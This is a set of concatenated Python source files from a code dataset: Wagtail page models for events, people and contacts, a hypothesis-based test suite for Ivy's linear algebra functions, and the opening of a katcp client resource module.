null=True,\n blank=True,\n help_text=\"Not required if event is on a single day\"\n )\n time_from = models.TimeField(\"Start time\", null=True, blank=True)\n time_to = models.TimeField(\"End time\", null=True, blank=True)\n audience = models.CharField(max_length=255, choices=AUDIENCE_CHOICES)\n location = models.CharField(max_length=255)\n body = RichTextField(blank=True)\n cost = models.CharField(max_length=255)\n signup_link = models.URLField(blank=True)\n feed_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n api_fields = (\n 'date_from',\n 'date_to',\n 'time_from',\n 'time_to',\n 'audience',\n 'location',\n 'body',\n 'cost',\n 'signup_link',\n 'feed_image',\n 'carousel_items',\n 'related_links',\n 'speakers',\n )\n\n search_fields = Page.search_fields + [\n index.SearchField('get_audience_display'),\n index.SearchField('location'),\n index.SearchField('body'),\n ]\n\n def get_event_index(self):\n # Find closest ancestor which is an event index\n return EventIndexPage.objects.ancester_of(self).last()\n\n\nclass EventPageCarouselItem(Orderable, AbstractCarouselItem):\n page = ParentalKey('EventPage', related_name='carousel_items', on_delete=models.CASCADE)\n\n\nclass EventPageRelatedLink(Orderable, AbstractRelatedLink):\n page = ParentalKey('EventPage', related_name='related_links', on_delete=models.CASCADE)\n\n\nclass EventPageSpeaker(Orderable, AbstractLinkFields):\n page = ParentalKey('EventPage', related_name='speakers', on_delete=models.CASCADE)\n first_name = models.CharField(\"Name\", max_length=255, blank=True)\n last_name = models.CharField(\"Surname\", max_length=255, blank=True)\n image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n api_fields = (\n 'first_name',\n 'last_name',\n 'image',\n )\n\n panels = [\n FieldPanel('first_name'),\n FieldPanel('last_name'),\n ImageChooserPanel('image'),\n MultiFieldPanel(AbstractLinkFields.panels, \"Link\"),\n ]\n\nEventPage.content_panels = Page.content_panels + [\n FieldPanel('date_from'),\n FieldPanel('date_to'),\n 
FieldPanel('time_from'),\n FieldPanel('time_to'),\n FieldPanel('location'),\n FieldPanel('audience'),\n FieldPanel('cost'),\n FieldPanel('signup_link'),\n InlinePanel('carousel_items', label=\"Carousel items\"),\n FieldPanel('body', classname=\"full\"),\n InlinePanel('speakers', label=\"Speakers\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\n\nEventPage.promote_panels = [\n MultiFieldPanel(Page.promote_panels, \"Common page configuration\"),\n ImageChooserPanel('feed_image'),\n]\n\n\nclass EventIndexPage(Page):\n page_ptr = models.OneToOneField(Page, parent_link=True, related_name='+', on_delete=models.CASCADE)\n intro = RichTextField(blank=True)\n\n api_fields = (\n 'intro',\n 'related_links',\n )\n\n search_fields = Page.search_fields + [\n index.SearchField('intro'),\n ]\n\n def get_events(self):\n # Get list of live event pages that are descendants of this page\n events = EventPage.objects.descendant_of(self).live()\n\n # Filter events list to get ones that are either\n # running now or start in the future\n events = events.filter(date_from__gte=date.today())\n\n # Order by date\n events = events.order_by('date_from')\n\n return events\n\n\nclass EventIndexPageRelatedLink(Orderable, AbstractRelatedLink):\n page = ParentalKey('EventIndexPage', related_name='related_links', on_delete=models.CASCADE)\n\n\nEventIndexPage.content_panels = Page.content_panels + [\n FieldPanel('intro', classname=\"full\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\n\n# Person page\n\nclass PersonPage(Page, ContactFieldsMixin):\n page_ptr = models.OneToOneField(Page, parent_link=True, related_name='+', on_delete=models.CASCADE)\n first_name = models.CharField(max_length=255)\n last_name = models.CharField(max_length=255)\n intro = RichTextField(blank=True)\n biography = RichTextField(blank=True)\n image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n feed_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n api_fields = (\n 'first_name',\n 'last_name',\n 'intro',\n 'biography',\n 'image',\n 'feed_image',\n 'related_links',\n ) + ContactFieldsMixin.api_fields\n\n search_fields = Page.search_fields + [\n index.SearchField('first_name'),\n index.SearchField('last_name'),\n index.SearchField('intro'),\n index.SearchField('biography'),\n ]\n\n\nclass PersonPageRelatedLink(Orderable, AbstractRelatedLink):\n page = ParentalKey('PersonPage', related_name='related_links', on_delete=models.CASCADE)\n\n\nPersonPage.content_panels = Page.content_panels + [\n FieldPanel('first_name'),\n FieldPanel('last_name'),\n FieldPanel('intro', classname=\"full\"),\n FieldPanel('biography', classname=\"full\"),\n ImageChooserPanel('image'),\n MultiFieldPanel(ContactFieldsMixin.panels, \"Contact\"),\n InlinePanel('related_links', label=\"Related links\"),\n]\n\n\nPersonPage.promote_panels = [\n MultiFieldPanel(Page.promote_panels, \"Common page configuration\"),\n ImageChooserPanel('feed_image'),\n]\n\n\n# Contact page\n\nclass ContactPage(Page, ContactFieldsMixin):\n page_ptr = models.OneToOneField(Page, parent_link=True, related_name='+', on_delete=models.CASCADE)\n body = RichTextField(blank=True)\n feed_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n api_fields = (\n 'body',\n 'feed_image',\n ) + ContactFieldsMixin.api_fields\n\n search_fields = 
Page.search_fields + [\n index.SearchField('body'),\n ]\n\n\nContactPage.content_panels = Page.content_panels + [\n FieldPanel('body', classname=\"full\"),\n MultiFieldPanel(ContactFieldsMixin.panels, \"Contact\"),\n]\n\n\nContactPage.promote_panels = [\n MultiFieldPanel(Page.promote_panels, \"Common page configuration\"),\n ImageChooserPanel('feed_image'),\n]\n"} {"ext": "py", "sha": "1a2ee26475bd8974ad69e81f1b56eb9dc019880d", "content": "\"\"\"Collection of tests for unified linear algebra functions.\"\"\"\n\n# global\nimport numpy as np\nfrom hypothesis import given, strategies as st\n\n# local\nimport ivy_tests.test_ivy.helpers as helpers\nimport ivy.functional.backends.numpy as ivy_np\n\n\n# vector_to_skew_symmetric_matrix\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n)\ndef test_vector_to_skew_symmetric_matrix(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n):\n if \"float16\" or \"int8\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"vector_to_skew_symmetric_matrix\",\n vector=np.random.uniform(size=(a, 3)).astype(input_dtype[0]),\n )\n\n\n# matrix_power\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n n=st.integers(-10, 10),\n)\ndef test_matrix_power(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n n,\n):\n if fw == \"torch\" and input_dtype == \"float16\":\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"matrix_power\",\n n=n,\n x=np.random.uniform(size=(a, a)).astype(input_dtype[0]),\n )\n\n\n# matmul\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 2),\n as_variable=helpers.list_of_length(st.booleans(), 2),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=helpers.list_of_length(st.booleans(), 2),\n container=helpers.list_of_length(st.booleans(), 2),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n c=st.integers(1, 50),\n seed=st.integers(0, 2**16 - 1),\n)\ndef test_matmul(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n c,\n seed,\n):\n np.random.seed(seed)\n if \"float16\" or \"int8\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"matmul\",\n rtol=5e-02,\n atol=5e-02,\n x1=np.random.uniform(size=(a, b)).astype(input_dtype[0]),\n x2=np.random.uniform(size=(b, c)).astype(input_dtype[1]),\n )\n\n\n# det\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n 
num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n)\ndef test_det(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"det\",\n x=np.random.uniform(size=(b, a, a)).astype(input_dtype[0]),\n )\n\n\n# eigh\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n)\ndef test_eigh(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"eigh\",\n x=np.random.uniform(size=(b, a, a)).astype(input_dtype[0]),\n )\n\n\n# eigvalsh\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n)\ndef test_eigvalsh(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"eigvalsh\",\n x=np.random.uniform(size=(b, a, a)).astype(input_dtype[0]),\n )\n\n\n# inv\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n)\ndef test_inv(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"inv\",\n x=np.random.uniform(size=(b, a, a)).astype(input_dtype[0]),\n )\n\n\n# matrix_transpose\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n)\ndef test_matrix_transpose(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n):\n if \"float16\" or \"int8\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n 
num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"matrix_transpose\",\n x=np.random.uniform(size=(a, b)).astype(input_dtype[0]),\n )\n\n\n# outer\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 2),\n as_variable=helpers.list_of_length(st.booleans(), 2),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=helpers.list_of_length(st.booleans(), 2),\n container=helpers.list_of_length(st.booleans(), 2),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n)\ndef test_outer(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n):\n if \"float16\" or \"int8\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"outer\",\n x1=np.random.uniform(size=a).astype(input_dtype[0]),\n x2=np.random.uniform(size=b).astype(input_dtype[1]),\n )\n\n\n# slogdet\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n)\ndef test_slogdet(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"slogdet\",\n x=np.random.uniform(size=(a, a)).astype(input_dtype[0]),\n )\n\n\n# solve\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 2),\n as_variable=helpers.list_of_length(st.booleans(), 2),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=helpers.list_of_length(st.booleans(), 2),\n container=helpers.list_of_length(st.booleans(), 2),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n)\ndef test_solve(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"solve\",\n x1=np.random.uniform(size=(a, a)).astype(input_dtype[0]),\n x2=np.random.uniform(size=(a, 1)).astype(input_dtype[1]),\n )\n\n\n# svdvals\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n)\ndef test_svdvals(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n):\n if \"float16\" or \"int8\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"svdvals\",\n x=np.random.uniform(size=(a, b)).astype(input_dtype[0]),\n )\n\n\n# tensordot\n@given(\n 
input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 2),\n as_variable=helpers.list_of_length(st.booleans(), 2),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=helpers.list_of_length(st.booleans(), 2),\n container=helpers.list_of_length(st.booleans(), 2),\n instance_method=st.booleans(),\n a=st.integers(1, 50) | st.tuples(st.lists(st.integers()), st.lists(st.integers())),\n b=st.integers(1, 50),\n c=st.integers(1, 50),\n d=st.integers(1, 50),\n)\ndef test_tensordot(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n c,\n d,\n):\n if \"float16\" or \"int8\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"tensordot\",\n axes=a,\n x1=np.random.uniform(size=(b, c)).astype(input_dtype[0]),\n x2=np.random.uniform(size=(c, d)).astype(input_dtype[1]),\n )\n\n\n# trace\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n c=st.integers(1, 50),\n offset=st.integers(-10, 10),\n)\ndef test_trace(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n c,\n offset,\n):\n if \"float16\" or \"int8\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"trace\",\n offset=offset,\n x=np.random.uniform(size=(a, b, c)).astype(input_dtype[0]),\n )\n\n\n# vecdot\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 2),\n as_variable=helpers.list_of_length(st.booleans(), 2),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=helpers.list_of_length(st.booleans(), 2),\n container=helpers.list_of_length(st.booleans(), 2),\n instance_method=st.booleans(),\n a=st.integers(-1, 50),\n b=st.integers(1, 50),\n c=st.integers(1, 50),\n)\ndef test_vecdot(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n c,\n):\n if \"float16\" or \"int8\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"vecdot\",\n axes=a,\n x1=np.random.uniform(size=(b, c)).astype(input_dtype[0]),\n x2=np.random.uniform(size=(b, b)).astype(input_dtype[1]),\n )\n\n\n# vector_norm\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n axis=st.integers(-10, 10) | st.tuples(st.lists(st.integers())),\n kd=st.booleans(),\n ord=st.integers() | st.floats(),\n)\ndef test_vector_norm(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n axis,\n kd,\n ord,\n):\n if \"float16\" in input_dtype:\n return\n 
helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"vector_norm\",\n axis=axis,\n keepdims=kd,\n ord=ord,\n x=np.random.uniform(size=(a, b)).astype(input_dtype[0]),\n )\n\n\n# pinv\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n c=st.integers(1, 50),\n seed=st.integers(0, 2**4 - 1),\n)\ndef test_pinv(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n c,\n seed,\n):\n if \"float16\" in input_dtype:\n return\n np.random.seed(seed)\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"pinv\",\n rtol=5e-02,\n x=np.random.uniform(size=(a, b, c)).astype(input_dtype[0]),\n )\n\n\n# qr\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n c=st.integers(1, 50),\n mode=st.sampled_from((\"reduced\", \"complete\")),\n)\ndef test_qr(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n c,\n mode,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"qr\",\n mode=mode,\n x=np.random.uniform(size=(a, b, c)).astype(input_dtype[0]),\n )\n\n\n# svd\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n c=st.integers(1, 50),\n fm=st.booleans(),\n)\ndef test_svd(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n c,\n fm,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"svd\",\n full_matrices=fm,\n x=np.random.uniform(size=(a, b, c)).astype(input_dtype[0]),\n )\n\n\n# matrix_norm\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n c=st.integers(1, 50),\n kd=st.booleans(),\n ord=st.integers(1, 10)\n | st.floats(1, 10)\n | st.sampled_from((\"fro\", \"nuc\", \"float('inf')\", \"-float('inf')\")),\n)\ndef test_matrix_norm(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n c,\n kd,\n ord,\n):\n if \"float16\" in 
input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"matrix_norm\",\n keepdims=kd,\n ord=ord,\n x=np.random.uniform(size=(a, b, c)).astype(input_dtype[0]),\n )\n\n\n# matrix_rank\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n c=st.integers(1, 50),\n)\ndef test_matrix_rank(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n c,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"matrix_rank\",\n rtol=5e-02,\n x=np.random.uniform(size=(a, b, c)).astype(input_dtype[0]),\n )\n\n\n# cholesky\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_float_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n upper=st.booleans(),\n)\ndef test_cholesky(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n upper,\n):\n if \"float16\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"cholesky\",\n upper=upper,\n x=np.random.uniform(size=(a, a)).astype(input_dtype[0]),\n )\n\n\n# cross\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 2),\n as_variable=helpers.list_of_length(st.booleans(), 2),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=helpers.list_of_length(st.booleans(), 2),\n container=helpers.list_of_length(st.booleans(), 2),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n axis=st.integers(-1, 50),\n)\ndef test_cross(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n axis,\n):\n if \"float16\" or \"int8\" in input_dtype:\n return\n helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"cross\",\n axis=axis,\n x1=np.random.uniform(size=(a, b)).astype(input_dtype[0]),\n x2=np.random.uniform(size=(a, b)).astype(input_dtype[1]),\n )\n\n\n# diagonal\n@given(\n input_dtype=helpers.list_of_length(st.sampled_from(ivy_np.valid_numeric_dtypes), 1),\n as_variable=st.booleans(),\n with_out=st.booleans(),\n num_positional_args=st.integers(0, 1),\n native_array=st.booleans(),\n container=st.booleans(),\n instance_method=st.booleans(),\n a=st.integers(1, 50),\n b=st.integers(1, 50),\n offset=st.integers(-10, 50),\n axes=st.lists(st.integers(-2, 50), min_size=2, max_size=2, unique=True),\n)\ndef test_diagonal(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n a,\n b,\n offset,\n axes,\n):\n if \"float16\" or \"int8\" in input_dtype:\n return\n 
helpers.test_array_function(\n input_dtype,\n as_variable,\n with_out,\n num_positional_args,\n native_array,\n container,\n instance_method,\n fw,\n \"diagonal\",\n offset=offset,\n axis1=axes[0],\n axis2=axes[1],\n x=np.random.uniform(size=(a, b)).astype(input_dtype[0]),\n )\n"} {"ext": "py", "sha": "1a2ee2cbf78b119984f8f1cc2ecb08d56c921a85", "content": "# Copyright 2014 National Research Foundation (South African Radio Astronomy Observatory)\n# BSD license - see LICENSE for details\n\"\"\"A high-level abstract interface to KATCP clients, sensors and requests.\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\nfrom future import standard_library\nstandard_library.install_aliases() # noqa: E402\n\nimport abc\nimport collections\nimport logging\nimport sys\n\nfrom builtins import object\n\nimport tornado\n\nfrom future.utils import with_metaclass, PY2\nfrom past.builtins import basestring\nfrom tornado.concurrent import Future\nfrom tornado.gen import Return, with_timeout\n\nfrom katcp import Message, Sensor\nfrom katcp.core import hashable_identity\nfrom katcp.compat import ensure_native_str\n\nlogger = logging.getLogger(__name__)\n\n\nclass KATCPResourceError(Exception):\n \"\"\"Error raised for resource-related errors\"\"\"\n\n\nclass KATCPResourceInactive(KATCPResourceError):\n \"\"\"Raised when a request is made to an inactive resource\"\"\"\n\n\nclass KATCPSensorError(KATCPResourceError):\n \"\"\"Raised if a problem occurred dealing with as KATCPSensor operation\"\"\"\n\n\nclass SensorResultTuple(collections.namedtuple(\n 'SensorResultTuple',\n 'object name python_identifier description type units reading')):\n \"\"\"Per-sensor result of list_sensors() method\n\n Attributes\n ----------\n object : KATCPSensor instance\n name : str\n KATCP (i.e. unescaped) name of the sensor\n python_identifier : str\n Python-identifier name of the sensor.\n description : str\n KATCP description of the sensor\n type : str\n KATCP type of the sensor\n units : str\n KATCP units of the sensor\n reading : KATCPSensorReading instance\n Most recently received sensor reading\n \"\"\"\n __slots__ = [] # Prevent dynamic attributes from being possible\n\n\ndef normalize_strategy_parameters(params):\n \"\"\"Normalize strategy parameters to be a list of strings.\n\n Parameters\n ----------\n params : (space-delimited) string or sequence of strings/numbers Parameters\n expected by :class:`SampleStrategy` object, in various forms, where the first\n parameter is the name of the strategy.\n\n Returns\n -------\n params : tuple of strings\n Strategy parameters as a list of strings\n\n \"\"\"\n def fixup_numbers(val):\n try:\n # See if it is a number\n return str(float(val))\n except ValueError:\n # ok, it is not a number we know of, perhaps a string\n return str(val)\n if isinstance(params, basestring):\n params = params.split(' ')\n # No number\n return tuple(fixup_numbers(p) for p in params)\n\n\ndef escape_name(name):\n \"\"\"Escape sensor and request names to be valid Python identifiers.\"\"\"\n return name.replace('.', '_').replace('-', '_')\n\n\nclass KATCPResource(with_metaclass(abc.ABCMeta, object)):\n\n \"\"\"Base class to serve as the definition of the KATCPResource API.\n\n A class `C` implementing the KATCPResource API should register itself using\n KATCPResource.register(C) or subclass KATCPResource directly. 
